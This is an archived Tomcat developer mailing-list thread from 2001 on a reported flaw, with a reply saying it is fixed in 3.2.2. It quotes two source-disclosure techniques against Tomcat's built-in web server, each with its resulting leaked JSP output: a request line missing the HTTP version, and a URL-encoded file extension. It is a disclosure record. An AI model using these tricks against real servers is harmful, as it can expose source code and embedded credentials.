tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Marc Saegesser" <marc.saeges...@apropos.com>
Subject RE: [Fwd: Tomcat may reveal script source code by URL trickery]
Date Wed, 04 Apr 2001 16:55:57 GMT
This is already fixed in 3.2.2.


> -----Original Message-----
> From: Craig R. McClanahan [mailto:Craig.McClanahan@eng.sun.com]
> Sent: Wednesday, April 04, 2001 11:09 AM
> To: tomcat-dev@jakarta.apache.org
> Subject: [Fwd: Tomcat may reveal script source code by URL trickery]
>
>
> Reported against Tomcat 3.2.1 on BugTraq.
>
> Craig
>
>
> Eric Daniel Mauricio wrote:
>
> > There is another way to get the source from a jsp page using Tomcat.
> >
> > If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
> > you will get the source code and not the jsp processed.
> >
> > In other words, use Apache + Tomcat if you intend to protect
> your source code.
> >
> > telnet maq106 8080
> > Trying 10.0.0.106...
> > Connected to maq106
> > Escape character is '^]'.
> > GET /examples/jsp/num/numguess.jsp
> > HTTP/1.0 200 OK
> > Content-Type: text/plain
> > Content-Length: 1237
> > Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
> > Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2;
> Java 1.3.0;
> > Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
> >
> > <!--
> >   Copyright (c) 1999 The Apache Software Foundation.  All rights
> >   reserved.
> >
> >   Number Guess Game
> >   Written by Jason Hunter, CTO, K&A Software
> >   http://www.servlets.com
> > -->
> >
> > <%@ page import = "num.NumberGuessBean" %>
> >
> > <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
> > <jsp:setProperty name="numguess" property="*"/>
> >
> > <html>
> > <head><title>Number Guess</title></head>
> > <body bgcolor="white">
> > <font size=4>
> >
> > <% if (numguess.getSuccess()) { %>
> >
> >   Congratulations!  You got it.
> >   And after just <%= numguess.getNumGuesses() %> tries.<p>
> >
> >   <% numguess.reset(); %>
> >
> >   Care to <a href="numguess.jsp">try again</a>?
> >
> > <% } else if (numguess.getNumGuesses() == 0) { %>
> >
> >   Welcome to the Number Guess game.<p>
> >
> >   I'm thinking of a number between 1 and 100.<p>
> >
> >   <form method=get>
> >   What's your guess? <input type=text name=guess>
> >   <input type=submit value="Submit">
> >   </form>
> >
> > <% } else { %>
> >
> >   Good guess, but nope.  Try <b><%= numguess.getHint() %></b>.
> >
> >   You have made <%= numguess.getNumGuesses() %> guesses.<p>
> >
> >   I'm thinking of a number between 1 and 100.<p>
> >
> >   <form method=get>
> >   What's your guess? <input type=text name=guess>
> >   <input type=submit value="Submit">
> >   </form>
> >
> > <% } %>
> >
> > </font>
> > </body>
> > </html>
> > Connection closed by foreign host.
> >
> > [],
> >
> >    ericmau
> >
> > "Sverre H. Huseby" <shh@THATHOST.COM> escreveu:
> >
> > > Tomcat may reveal script source code by URL trickery
> > > ----------------------------------------------------
> > >
> > > Sverre H. Huseby advisory 2001-03-29
> > >
> > >
> > >
> > > Systems affected
> > > ----------------
> > >
> > > Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
> > > tested.  Other versions may be vulnerable too.  The problem is only
> > > present when using Tomcat's built in web server, not when using Tomcat
> > > with Apache Web Server.
> > >
> > >
> > > Description
> > > -----------
> > >
> > > Tomcat (http://jakarta.apache.org/tomcat/), the Reference
> > > Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
> > > Technologies, may be tricked into revealing the source code of JSP
> > > scripts by using simple URL encoding.
> > >
> > >
> > > Details
> > > -------
> > >
> > > It seems that the built in web server in Tomcat does URL decoding in
> > > an unreasonable order.  URLs like the following
> > >
> > >   http://XXX:8080/examples/jsp/num/numguess.js%70
> > >
> > > where %70 is an URL encoded 'p', returns the source code of index.jsp
> > > rather than running the script on the server side.
> > >
> > > To speculate: The JSP handler is skipped as this URL does not end in
> > > ".jsp", but the static file handler is nevertheless able to map the
> > > URL into a correct file name.
> > >
> > >
> > > Impact
> > > ------
> > >
> > > This design error makes it possible to fetch the source code of JSP
> > > scripts.  Such source code may contain database passwords and file
> > > names, and may reveal design errors or programming bugs that make it
> > > possible to further exploit the server or service.
> > >
> > >
> > >
> > > Reported by Sverre H. Huseby, shh@thathost.com
> > >
> > > --
> > > <URL:mailto:shh@thathost.com>
> > > <URL:http://shh.thathost.com/>
> > >


Mime
View raw message